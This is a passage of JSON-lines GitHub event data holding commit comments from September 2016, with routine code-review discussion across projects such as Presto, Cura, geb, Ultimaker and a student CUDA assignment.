just to be lazy, especially as someone who's written more c++ applications than python ones.\r\n\r\nSo I'm putting semi-colons back where they're \"missing\"."}},"created_at":"2016-09-27T08:50:13Z"}
{"id":"4622787960","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19187022,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T08:50:20Z","updated_at":"2016-09-27T08:50:20Z","body":"So what do we need to change in NimManager to get this fix working?"}},"created_at":"2016-09-27T08:50:20Z"}
{"id":"4622789375","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19187026,"position":21,"line":37,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:50:37Z","updated_at":"2016-09-27T08:50:37Z","body":"Yeah it can be a little strange. `Number.isNaN` isn't as widely supported. But in this case because I've just called `parseInt` I think it eliminates those weird cases - the result is either an integer or NaN."}},"created_at":"2016-09-27T08:50:37Z"}
{"id":"4622790593","type":"CommitCommentEvent","actor":{"login":"footman97"},"repo":{"name":"footman97/Data-Structure"},"payload":{"comment":{"id":19187028,"position":null,"line":null,"path":null,"commit_id":"8d988c1f960b9ea9eb98aacad11decd591c496d5","created_at":"2016-09-27T08:50:51Z","updated_at":"2016-09-27T08:50:51Z","body":"测试评论功能"}},"created_at":"2016-09-27T08:50:51Z"}
{"id":"4622790673","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19187029,"position":null,"line":null,"path":null,"commit_id":"ee0d307696c8fbc12949fcd3b4fa8150f4069b0a","created_at":"2016-09-27T08:50:52Z","updated_at":"2016-09-27T08:50:52Z","body":"This is pointless :-)\r\n\r\nanyway, nim is working on that so I'd suggest to check out his patch when he's done"}},"created_at":"2016-09-27T08:50:52Z"}
{"id":"4622791059","type":"CommitCommentEvent","actor":{"login":"cyan"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19187030,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T08:50:56Z","updated_at":"2016-09-27T08:50:56Z","body":"yeah, i agree to the fact that those pictures are really to big :/"}},"created_at":"2016-09-27T08:50:56Z"}
{"id":"4622793248","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"geb/geb"},"payload":{"comment":{"id":19187033,"position":null,"line":null,"path":null,"commit_id":"51a58bba7454ba7f7b9cfda1f9b2e26e8e4793d2","created_at":"2016-09-27T08:51:21Z","updated_at":"2016-09-27T08:51:21Z","body":"Thanks. So I understand that when migrating to 1.0, I should include this in my pages' `content` specification, like \r\n```groovy\r\nstatic content = {\r\n  submit { $('input[type=submit]').module(FormElement) }\r\n}\r\n```\r\nIs this correct? Or should I rather write `submit.module(FormElement).click()`?"}},"created_at":"2016-09-27T08:51:21Z"}
{"id":"4622793752","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19187034,"position":11,"line":11,"path":"footparse/fifa.py","commit_id":"b6d4c869b304ae80d57cb31c4750d2ab9edbe67b","created_at":"2016-09-27T08:51:27Z","updated_at":"2016-09-27T08:51:27Z","body":"I'd rather put this in `__init__`, such that the parsing is done only once, when the object is created. Same for `ratings()`."}},"created_at":"2016-09-27T08:51:27Z"}
{"id":"4622795017","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187036,"position":65,"line":65,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-27T08:51:43Z","updated_at":"2016-09-27T08:51:43Z","body":"Поясню вопрос: в смысле почему не функция. Почему это метод класса? "}},"created_at":"2016-09-27T08:51:43Z"}
{"id":"4622795689","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187040,"position":22,"line":22,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T08:51:51Z","updated_at":"2016-09-27T08:51:51Z","body":"Ок, здесь должен подойти static_cast"}},"created_at":"2016-09-27T08:51:51Z"}
{"id":"4622796833","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187042,"position":76,"line":76,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"a89b2892eaec4af4b8ca9793b8a099ace9746d7a","created_at":"2016-09-27T08:52:04Z","updated_at":"2016-09-27T08:52:04Z","body":"Вы не удаляете объект"}},"created_at":"2016-09-27T08:52:04Z"}
{"id":"4622799214","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19187049,"position":1,"line":1,"path":"class_1/ps_1_4.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:52:33Z","updated_at":"2016-09-27T08:52:33Z","body":"for loops are preferable. Otherwise looks good to me"}},"created_at":"2016-09-27T08:52:33Z"}
{"id":"4622799605","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19187050,"position":21,"line":37,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:52:37Z","updated_at":"2016-09-27T08:52:37Z","body":"maybe we should just be calling `if (weeks != weeks)` then:\r\n\r\n> Alternatively, in absense of `Number.isNaN`, the expression `(x != x)` is a more reliable way to test whether variable x is `NaN` or not, as the result is not subject to the false positives that make `isNaN` unreliable.\r\n\r\nAlthough possibly debate about whether it's widely supported is unimportant, as this will all be running on node."}},"created_at":"2016-09-27T08:52:37Z"}
{"id":"4622801485","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19187053,"position":12,"line":521,"path":"cura/BuildVolume.py","commit_id":"5ac609edc9c315c1704369780963c8a7e89c7ed2","created_at":"2016-09-27T08:52:59Z","updated_at":"2016-09-27T08:52:59Z","body":"Ah, but Infill Wipe Distance is settable per object, and otherwise just uses the normal extruder (that it uses for infill). It's not the platform adhesion extruder. Likewise for X/Y offset.\r\n\r\nTravel Avoid Distance is not settable per object, but also uses the normal extruder."}},"created_at":"2016-09-27T08:52:59Z"}
{"id":"4622801908","type":"CommitCommentEvent","actor":{"login":"SlowMemory"},"repo":{"name":"SlowMemory/List-KR"},"payload":{"comment":{"id":19187056,"position":null,"line":null,"path":null,"commit_id":"f76d9acf35552af0ddb468aa30bcba4f5ee78a00","created_at":"2016-09-27T08:53:04Z","updated_at":"2016-09-27T08:53:04Z","body":"http://test.adbasket.kr/sdk_sample/tvple/mobile/js/adbasket.sdk.1.0.1.js?8208"}},"created_at":"2016-09-27T08:53:04Z"}
{"id":"4622802140","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187057,"position":24,"line":101,"path":"plotter/MathPlotter/MathPlotter/PlotterWindow.cpp","commit_id":"3a004c1938ef0d959df47f17f54ec4f281b42b24","created_at":"2016-09-27T08:53:06Z","updated_at":"2016-09-27T08:53:06Z","body":"Удаление объектов отлично делается через RAII и unique_ptr"}},"created_at":"2016-09-27T08:53:06Z"}
{"id":"4622804464","type":"CommitCommentEvent","actor":{"login":"Andrettin"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19187063,"position":null,"line":null,"path":null,"commit_id":"8e4e3187b63f7003315387dc55c7118ae9709fae","created_at":"2016-09-27T08:53:35Z","updated_at":"2016-09-27T08:53:35Z","body":"That was a bug, thanks for reporting it :) It happened only on Easy difficulty, which is why I missed it; it's fixed now with the latest Wyrmsun commit."}},"created_at":"2016-09-27T08:53:35Z"}
{"id":"4622804503","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19187064,"position":null,"line":null,"path":null,"commit_id":"b6d4c869b304ae80d57cb31c4750d2ab9edbe67b","created_at":"2016-09-27T08:53:36Z","updated_at":"2016-09-27T08:53:36Z","body":"Nice 😃 !!"}},"created_at":"2016-09-27T08:53:36Z"}
{"id":"4622808443","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187075,"position":14,"line":14,"path":"math-redactor/CBuildVisitorResult.h","commit_id":"b30ff962badf4d53c91afcf551cca29929b3a5f8","created_at":"2016-09-27T08:54:21Z","updated_at":"2016-09-27T08:54:21Z","body":"почему передаем строчку по значению?"}},"created_at":"2016-09-27T08:54:21Z"}
{"id":"4622808737","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19187077,"position":24,"line":491,"path":"presto-main/src/main/java/com/facebook/presto/type/DecimalCasts.java","commit_id":"96743cc48cf7197895f55f2a7f27d81e0986792a","created_at":"2016-09-27T08:54:25Z","updated_at":"2016-09-27T08:54:25Z","body":"@pnowojski this might throw ArithmeticException. Catch that and add test case"}},"created_at":"2016-09-27T08:54:25Z"}
{"id":"4622809771","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19187085,"position":null,"line":null,"path":null,"commit_id":"2aac83173bbf0f92e0737b596988034aec3edbe0","created_at":"2016-09-27T08:54:36Z","updated_at":"2016-09-27T08:54:36Z","body":"@lucabrivio At least it will be interesting to see if this tuning will give different results."}},"created_at":"2016-09-27T08:54:36Z"}
{"id":"4622810740","type":"CommitCommentEvent","actor":{"login":"gravitystorm"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187087,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T08:54:48Z","updated_at":"2016-09-27T08:54:48Z","body":"operations@ is definitely not an appropriate email address - OWG has no remit over this project, and is a different group of people, most of whom don't work on this software. Lets not cause any confusion here!"}},"created_at":"2016-09-27T08:54:48Z"}
{"id":"4622812033","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19187090,"position":4,"line":650,"path":"truffle/src/main/c/cext/ruby.c","commit_id":"601b267202430491127716af7d70c62e2cf9ca2c","created_at":"2016-09-27T08:55:03Z","updated_at":"2016-09-27T08:55:03Z","body":"What if the helper returns an Array, and then sth like:\r\n```c\r\nfor (int i=0; i<argc; i++) {\r\n  *((VALUE*)truffle_get_arg(i)) = truffle_read(vals, i);\r\n}\r\n```\r\nBut I guess you would still need clang to inline which it doesn't through a variadic function?\r\nMaybe `__builtin_choose_expr` can be used to do that.\r\nThere is some black magic in MRI which seems has the power to get how many arguments are passed and more:\r\nhttps://github.com/ruby/ruby/blob/trunk/include/ruby/ruby.h#L2123"}},"created_at":"2016-09-27T08:55:03Z"}
{"id":"4622817057","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19187106,"position":21,"line":528,"path":"cura/BuildVolume.py","commit_id":"5ac609edc9c315c1704369780963c8a7e89c7ed2","created_at":"2016-09-27T08:56:01Z","updated_at":"2016-09-27T08:56:01Z","body":"Travel Avoid Distance and Infill Wipe Distance are still being added to the total, rather than taking the maximum of the three. You could remove the `+` here, or better just let `skirt_size = max(skirt_size, travel_avoid_distance)`."}},"created_at":"2016-09-27T08:56:01Z"}
{"id":"4622817291","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19187108,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T08:56:04Z","updated_at":"2016-09-27T08:56:04Z","body":"OK I will help you to solve it.\r\nSo this issues because you ported CAF patch?\r\n"}},"created_at":"2016-09-27T08:56:04Z"}
{"id":"4622818771","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19187113,"position":40,"line":502,"path":"presto-main/src/main/java/com/facebook/presto/type/DecimalCasts.java","commit_id":"7df25d127260a91162356d04707178281cefc5f8","created_at":"2016-09-27T08:56:21Z","updated_at":"2016-09-27T08:56:21Z","body":"@pnowojski why this is public? This throws ArithmeticException which needs to be catched (no test case, tests pass)"}},"created_at":"2016-09-27T08:56:21Z"}
{"id":"4622820905","type":"CommitCommentEvent","actor":{"login":"r3nya"},"repo":{"name":"r3nya/homepage"},"payload":{"comment":{"id":19187115,"position":null,"line":null,"path":null,"commit_id":"b2b8a7acb85dedf98bfd022975f4d3131b0c9d67","created_at":"2016-09-27T08:56:46Z","updated_at":"2016-09-27T08:56:46Z","body":"FYI: https://developer.mozilla.org/en-US/docs/Web/CSS/text-decoration-skip"}},"created_at":"2016-09-27T08:56:46Z"}
{"id":"4622821667","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187116,"position":20,"line":20,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T08:56:55Z","updated_at":"2016-09-27T08:56:55Z","body":"Метод visit должен вызываться только методом Accept (противное использование не предполагается, там можно на 0 сразу assert ставить), а метод access определяется как return visitor->visit(this), то есть здесь падать не должно. Вижу смысл добавить разве что проверку указателя для visitor (в аргументах accept) или там поменять передачу визитора, на передачу по ссылке"}},"created_at":"2016-09-27T08:56:55Z"}
{"id":"4622821926","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19187118,"position":41,"line":540,"path":"presto-main/src/main/java/com/facebook/presto/type/DecimalCasts.java","commit_id":"75812acfee4be122fa3abadd711d4fa21bb59156","created_at":"2016-09-27T08:56:58Z","updated_at":"2016-09-27T08:56:58Z","body":"may throw ArithmeticException"}},"created_at":"2016-09-27T08:56:58Z"}
{"id":"4622822895","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19187123,"position":null,"line":null,"path":null,"commit_id":"ba1802f187f35145c584a4f9ee81a5b0c3c83b1f","created_at":"2016-09-27T08:57:11Z","updated_at":"2016-09-27T08:57:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1168](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14282&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:09:12"}},"created_at":"2016-09-27T08:57:11Z"}
{"id":"4622823817","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19187128,"position":null,"line":null,"path":null,"commit_id":"751e58dec1800ce9660800b2a1f015ee845c9b05","created_at":"2016-09-27T08:57:22Z","updated_at":"2016-09-27T08:57:22Z","body":"Obvious observation from this:\r\n\r\nMemory access time must have consumed a significant amount of time in the original algorithm, as the only change here is the fact that instead of reading the value of result.element[i][j], adding the value a.element[i][k] * b.element[k][j] to it, and writing the value of the sum to result.element[i][j] again k times, we simply create a local variable \"results\" to act on behalf of result.element[i][j], before finally writing the value of \"results\" to result.element[i][j] at the end of the k iterations.\r\n\r\nThe significant improvement in timings confirms the fact that the cache is fast but small (L2 cache size of 128kB according to http://www.orangeowlsolutions.com/archives/1014, and floats are 4 bytes each, so maximum of 32768 floats, which incidentally the number is also 32^3), while the memory is big but slow (I'm being Captain Obvious, I know, but hear me out). While we cannot ascertain for sure the exact number of floats being stored in the cache from the memory whenever a read is required (admittedly, yes, we could, but I do not have the expertise nor the specialty to do so), we can deduce that it is not a small number, due to the huge performance gains in terms of time from simply not accessing the results.element[i][j] (and potentially the other elements of the same matrix around it - I need to Google out the exact name of that terminology) until the very end when it is required.\r\n\r\ntl;dr: Access one element from a huge matrix = bad.\r\n\r\nPotential next step:\r\n1. Maybe dig more into the cache-memory relationship and find out how many floats of a matrix and exactly which (are they in a horizontal row, or a vertical row, or a k x k block?) when moved from memory to cache? Seems like a very deep topic to delve into, though\r\n2. Try messing around with dimensions and block size? It's something that has been suggested since the start, but I really like how I have been putting it off until I learn more about the CUDA architecture of arranging threads into blocks, and blocks into grids, and grarghhh toooo complicaaaaated\r\n\r\nP.S.: Remember kids, the only difference between science and screwing around is writing it down!"}},"created_at":"2016-09-27T08:57:22Z"}
{"id":"4622825071","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19187132,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T08:57:36Z","updated_at":"2016-09-27T08:57:36Z","body":"I think. do you think that it can be related to LGH830 sourcecode porting?\r\n"}},"created_at":"2016-09-27T08:57:36Z"}
{"id":"4622828934","type":"CommitCommentEvent","actor":{"login":"sveisvei"},"repo":{"name":"finn-no/unleash-client-node"},"payload":{"comment":{"id":19187142,"position":null,"line":null,"path":null,"commit_id":"3667d942ac0c3f79e4fa5bb3e80ef4312397ba33","created_at":"2016-09-27T08:58:20Z","updated_at":"2016-09-27T08:58:20Z","body":"👍 "}},"created_at":"2016-09-27T08:58:20Z"}
{"id":"4622829127","type":"CommitCommentEvent","actor":{"login":"huangliangxing"},"repo":{"name":"huangliangxing/angular8"},"payload":{"comment":{"id":19187144,"position":null,"line":null,"path":null,"commit_id":"7c5caaef2d0f4c81cc8c0578f5345f9f02a685cc","created_at":"2016-09-27T08:58:22Z","updated_at":"2016-09-27T08:58:22Z","body":" 黄亮星 https://github.com/huangliangxing/angular8"}},"created_at":"2016-09-27T08:58:22Z"}
{"id":"4622830109","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187145,"position":33,"line":109,"path":"YaPyN/YaPyN/YaPyN_MainWindow.cpp","commit_id":"e61a3a04e5bab2f57920dceba8c58b6ba0ef936d","created_at":"2016-09-27T08:58:34Z","updated_at":"2016-09-27T08:58:34Z","body":"Хардкод имени файла\r\n"}},"created_at":"2016-09-27T08:58:34Z"}
{"id":"4622831279","type":"CommitCommentEvent","actor":{"login":"erdi"},"repo":{"name":"geb/geb"},"payload":{"comment":{"id":19187147,"position":null,"line":null,"path":null,"commit_id":"51a58bba7454ba7f7b9cfda1f9b2e26e8e4793d2","created_at":"2016-09-27T08:58:47Z","updated_at":"2016-09-27T08:58:47Z","body":"You only need to make it a `FormElement` module (the way you shown in a content block) if you want to use any of the removed properties. No need to change anything just for clicking because `click()` is still on `Navigator` but it won't hurt either because `Module` implements `Navigator` so you still get the same API. "}},"created_at":"2016-09-27T08:58:47Z"}
{"id":"4622833420","type":"CommitCommentEvent","actor":{"login":"erdi"},"repo":{"name":"geb/geb"},"payload":{"comment":{"id":19187151,"position":null,"line":null,"path":null,"commit_id":"51a58bba7454ba7f7b9cfda1f9b2e26e8e4793d2","created_at":"2016-09-27T08:59:11Z","updated_at":"2016-09-27T08:59:11Z","body":"Btw, probably best to ask questions like that on the mailing list in the future."}},"created_at":"2016-09-27T08:59:11Z"}
{"id":"4622833498","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"gitextensions/gitextensions"},"payload":{"comment":{"id":19187152,"position":null,"line":null,"path":null,"commit_id":"05c13bf15c1594854a9ca2d5c5f027e902afd604","created_at":"2016-09-27T08:59:11Z","updated_at":"2016-09-27T08:59:11Z","body":"What about the release of the new version? In the download version last year."}},"created_at":"2016-09-27T08:59:11Z"}
{"id":"4622837647","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19187162,"position":null,"line":null,"path":null,"commit_id":"751e58dec1800ce9660800b2a1f015ee845c9b05","created_at":"2016-09-27T08:59:57Z","updated_at":"2016-09-27T08:59:57Z","body":"SUDDEN IDEA!! Instead of 2-dimensional array, why don't we make it 1-dimensional? That would control the memory into cache retrieval better if the orientation goes against the one we wanted, or generally if it works on a block-by-block basis!\r\n\r\nNeed to study more on how exactly matrix multiplication works before I can do so though\r\n\r\nAlso, this is really helpful: https://www.shodor.org/media/content/petascale/materials/UPModules/matrixMultiplication/moduleDocument.pdf"}},"created_at":"2016-09-27T08:59:57Z"}
{"id":"4622838157","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19187167,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T09:00:03Z","updated_at":"2016-09-27T09:00:03Z","body":"I tested for two days, no bugs with my kernel.\r\nI will cherry your ports tomorrow and test it. :)"}},"created_at":"2016-09-27T09:00:03Z"}
{"id":"4622838223","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19187168,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-27T09:00:04Z","updated_at":"2016-09-27T09:00:04Z","body":"![Szeptember 27. - Kedd](http://ujlipot.vakvarju.com/data/napimenu/21.jpg?v=1474635871)\nBazsalikomos sajtkrémleves kukorica tortillával\r\nTemesvári sertésborda szarvacska tésztával\r\nAranygaluska vaníliasodóval"}},"created_at":"2016-09-27T09:00:04Z"}
{"id":"4622839276","type":"CommitCommentEvent","actor":{"login":"robinsch"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19187171,"position":null,"line":null,"path":null,"commit_id":"442fbf019f5bb7c68fc85f4bacbcba0b8b1dd24c","created_at":"2016-09-27T09:00:14Z","updated_at":"2016-09-27T09:00:14Z","body":"nothing"}},"created_at":"2016-09-27T09:00:14Z"}
{"id":"4622842050","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19187178,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-27T09:00:41Z","updated_at":"2016-09-27T09:00:41Z","body":"I'm afraid to tell you that rendering is even better now. Maybe you can test it yourself, grab latest git release and try to toggle `page down` a couple of times."}},"created_at":"2016-09-27T09:00:41Z"}
{"id":"4622842962","type":"CommitCommentEvent","actor":{"login":"bhashain"},"repo":{"name":"bhashain/Self"},"payload":{"comment":{"id":19187180,"position":null,"line":null,"path":null,"commit_id":"f42656136c4250b684f81e082dc268e830a37947","created_at":"2016-09-27T09:00:50Z","updated_at":"2016-09-27T09:00:50Z","body":"[SAP-master.zip](https://github.com/bhashain/Self/files/495010/SAP-master.zip)\r\n"}},"created_at":"2016-09-27T09:00:50Z"}
{"id":"4622846059","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187186,"position":14,"line":14,"path":"math-redactor/CBuildVisitorResult.h","commit_id":"b30ff962badf4d53c91afcf551cca29929b3a5f8","created_at":"2016-09-27T09:01:25Z","updated_at":"2016-09-27T09:01:25Z","body":"Это недоразумение)"}},"created_at":"2016-09-27T09:01:25Z"}
{"id":"4622848136","type":"CommitCommentEvent","actor":{"login":"oguzcandemircan"},"repo":{"name":"oguzcandemircan/slc-depo"},"payload":{"comment":{"id":19187191,"position":2,"line":2,"path":"README.md","commit_id":"0f6dda9d1c7c9c6ea58e7578f0ae88074f1c4e6c","created_at":"2016-09-27T09:01:49Z","updated_at":"2016-09-27T09:01:49Z","body":"dd"}},"created_at":"2016-09-27T09:01:49Z"}
{"id":"4622848220","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19187192,"position":null,"line":null,"path":null,"commit_id":"075880f17ffe6eb560c210c243bd4670c46bf4dc","created_at":"2016-09-27T09:01:49Z","updated_at":"2016-09-27T09:01:49Z","body":"Why ? Why not class=\"bootstrap-switch ls-bootstrap-switch\"  ?\r\n\r\nPS: the switch HTML from extension is (or Yii checkbox) \r\n````\r\n<input type=\"hidden\" value=\"N\" name=\"name\">\r\n<input type=\"checkbox\" value=\"Y\" name=\"name\"\r\n````\r\n\r\nIf you set uncheckValue=>'N' in htmlOptions of http://www.yiiframework.com/doc/api/1.1/CHtml#checkBox-detail.\r\n\r\nSeems the best solution to use directly $POSTED value :)"}},"created_at":"2016-09-27T09:01:49Z"}
{"id":"4622853631","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19187199,"position":36,"line":118,"path":"squelette/jsExos/ALEX_CH04.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T09:02:50Z","updated_at":"2016-09-27T09:02:50Z","body":"This code `var frame = performance.now()/15|1;` does what exactly ?\r\nGonna refactor a few variable names too."}},"created_at":"2016-09-27T09:02:50Z"}
{"id":"4622860562","type":"CommitCommentEvent","actor":{"login":"rgubby"},"repo":{"name":"talis/tripod-php"},"payload":{"comment":{"id":19187217,"position":103,"line":1815,"path":"src/mongo/Config.class.php","commit_id":"1e6b05d31d2cfd33a9f3d478cc2c3a93417b64bb","created_at":"2016-09-27T09:04:05Z","updated_at":"2016-09-27T09:04:05Z","body":"yes"}},"created_at":"2016-09-27T09:04:05Z"}
{"id":"4622861764","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19187224,"position":12,"line":521,"path":"cura/BuildVolume.py","commit_id":"5ac609edc9c315c1704369780963c8a7e89c7ed2","created_at":"2016-09-27T09:04:19Z","updated_at":"2016-09-27T09:04:19Z","body":"Infill wipe per object is impossible at this point. "}},"created_at":"2016-09-27T09:04:19Z"}
{"id":"4622863735","type":"CommitCommentEvent","actor":{"login":"mikelmaron"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187229,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:04:40Z","updated_at":"2016-09-27T09:04:40Z","body":"If we do not have a better place right now, let's not block and use board@osmfoundation.org for the time being."}},"created_at":"2016-09-27T09:04:40Z"}
{"id":"4622864308","type":"CommitCommentEvent","actor":{"login":"LucScu"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19187231,"position":null,"line":null,"path":null,"commit_id":"7597a52dbf7179106b4ebba928dc04efbe6a8c78","created_at":"2016-09-27T09:04:45Z","updated_at":"2016-09-27T09:04:45Z","body":"@jessp855 i tried this fix and it works."}},"created_at":"2016-09-27T09:04:45Z"}
{"id":"4622867219","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19187235,"position":21,"line":528,"path":"cura/BuildVolume.py","commit_id":"5ac609edc9c315c1704369780963c8a7e89c7ed2","created_at":"2016-09-27T09:05:21Z","updated_at":"2016-09-27T09:05:21Z","body":"Derp. that's a copy paste issue on my end. It should be skirt_size = travel_avoid_distance.\r\nUsing the max is also possible, so i will change that."}},"created_at":"2016-09-27T09:05:21Z"}
{"id":"4622882379","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19187267,"position":961,"line":2920,"path":"EMF/common/scripted_effects/00_scripted_effects.txt","commit_id":"3b33b5b53e586a2d5dbabe1ce6ae6b13211fe3a5","created_at":"2016-09-27T09:08:15Z","updated_at":"2016-09-27T09:08:15Z","body":"compatch note: these opinions will need to be updated to include every opinion modifier in EMF which gives a `prison_reason=yes`. I didn't bother to cross-reference for now, but somebody will have to do so at some point, I guess."}},"created_at":"2016-09-27T09:08:15Z"}
{"id":"4622886994","type":"CommitCommentEvent","actor":{"login":"faassen"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19187279,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-27T09:09:12Z","updated_at":"2016-09-27T09:09:12Z","body":"It's good our changes are being reviewed.\r\n\r\nI like that ``py.test`` can work without specifying ``morepath``, that is a small thing but it does fit what we're doing with ``py.test`` already.\r\n\r\nI didn't realize there is a ``coverage`` tool; I just assumed to check coverage we're to use ``py.test`` and hadn't read ``tox.ini`` in detail. It strikes me that using ``py.test`` in our documentation as well as in ``tox`` for coverage is more consistent than using ``coverage`` itself directly, as it's less moving parts to understand. So I for one think it's fine to move that configuration into ``.coveragerc``.\r\n\r\nI guess this is question of general principles:\r\n\r\n* do we use as few config files as much as possible and focus stuff in ``tox.ini``, so it's all in one place.\r\n\r\n* do we use the tool-specific config files as much as possible and leave ``tox.ini`` small.\r\n\r\nI'm leaning towards the latter, because we *do* want to be able to use these tools without using ``tox``, so they need their own configuration independent from tox. So documentation config goes into ``doc/conf.py``, coverage configuration into ``.coveragerc``, etc. ``py.test`` itself is a strange one as it does check ``tox.ini`` for its own 